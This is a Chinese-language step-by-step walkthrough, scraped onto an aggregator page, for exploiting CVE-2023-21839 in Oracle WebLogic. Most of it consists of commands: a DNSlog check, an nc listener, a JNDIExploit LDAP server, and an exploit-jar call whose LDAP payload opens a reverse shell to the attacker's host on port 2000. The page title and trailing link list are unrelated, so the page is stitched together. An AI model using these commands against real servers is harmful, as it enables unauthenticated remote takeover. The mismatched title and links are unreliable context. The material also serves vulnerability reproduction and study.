当前位置: 首页 > news >正文

wordpress 整站源码网站建设要学

wordpress 整站源码,网站建设要学,网站搭建报价单,深圳制作网站培训文章目录 一、漏洞影响版本二、漏洞验证三、启动反弹shell监听切换路径到jdk1.8 四、启动ldap服务五、使用CVE-2023-21839工具来进行攻击测试六、反弹shell 一、漏洞影响版本 CVE-2023-21839是Weblogic产品中的远程代码执行漏洞,由于Weblogic IIOP/T3协议存在缺陷&…

文章目录

  • 一、漏洞影响版本
  • 二、漏洞验证
  • 三、启动反弹shell监听
    • 切换路径到jdk1.8
  • 四、启动ldap服务
  • 五、使用CVE-2023-21839工具来进行攻击测试
  • 六、反弹shell

一、漏洞影响版本

CVE-2023-21839是Weblogic产品中的远程代码执行漏洞,由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功可能会导致Oracle Weblogic服务器被控制,远程注入操作系统命令或代码。

Weblogic 12.2.1.3.0
Weblogic 12.2.1.4.0
Weblogic 14.1.1.0.0

二、漏洞验证

http://192.168.232.131:7001/console/login/LoginForm.jsp
在这里插入图片描述

java -jar Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://m08q4j.dnslog.cn/test
执行以上命令可以在dnslog上获得回显,即可验证可能存在该漏洞
在这里插入图片描述

三、启动反弹shell监听

nc -lvp 2000
在这里插入图片描述

切换路径到jdk1.8

复现之前请务必切换路径到jdk路径下

四、启动ldap服务

C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\JNDIExploit.v1.2\JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.180.2
在这里插入图片描述

五、使用CVE-2023-21839工具来进行攻击测试

C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://192.168.180.2:1389/Basic/ReverseShell/192.168.180.2/2000
在这里插入图片描述

六、反弹shell

在这里插入图片描述

http://www.yayakq.cn/news/33985/

相关文章:

  • 河北城乡建设网站企业建立网站需要
  • 嘉盛建设集团官方网站一个网站要注意哪些问题
  • 婚庆公司网站模板下载零代码建站
  • 上海 科技网站建设怎么在公众号做影视网站
  • 在线观看免费网站网址南京高端网站设计
  • 上海网站优化推广公司注册会计师报名条件
  • 深圳有做网站最近价格?wordpress企业免费主题下载
  • 中英文网站英文无锡专业制作外贸网站的公司
  • 网站建设技术支持祥云平台那个网站可以做域名跳转的
  • 表白网页制作免费网站制作推荐网站建设服务商
  • 宝坻手机网站建设wordpress博客打开慢
  • 网站改版被降权江阴哪里有做网站的
  • 嘉兴南湖区优秀营销型网站建设网站备案主体修改
  • 上海网站建设公司指南大连公司名称大全
  • 注册网站做推广网站导航cms
  • 响应式网站 翻译代码网站域名的根目录在哪里
  • 韶关网站建设科技有限公司做网站收费多少
  • 网站建设一般需要多少费用电子商务网站建设与管理英文
  • 免费查企业电话网站怎样建网站得花多少钱
  • 网站公司logo设计如何创建网址快捷方式
  • 阿里巴巴做网站装饰工程投标书
  • 网站建设推广扬州南昌做购物网站的公司
  • 京东联盟怎么做网站建设银行网网站打不开
  • 免费传奇网站免费传奇云空间的网站
  • 衡水网站推广抖音小程序源码
  • 石家庄网站建设 河北供求网网站利用百度离线地图
  • 乐山 网站建设电脑软件制作入门教程
  • 网站设计制造深圳网站关键词
  • 兰州网站seo技术厂家企业咨询培训
  • 网站推广风险wordpress 标题截取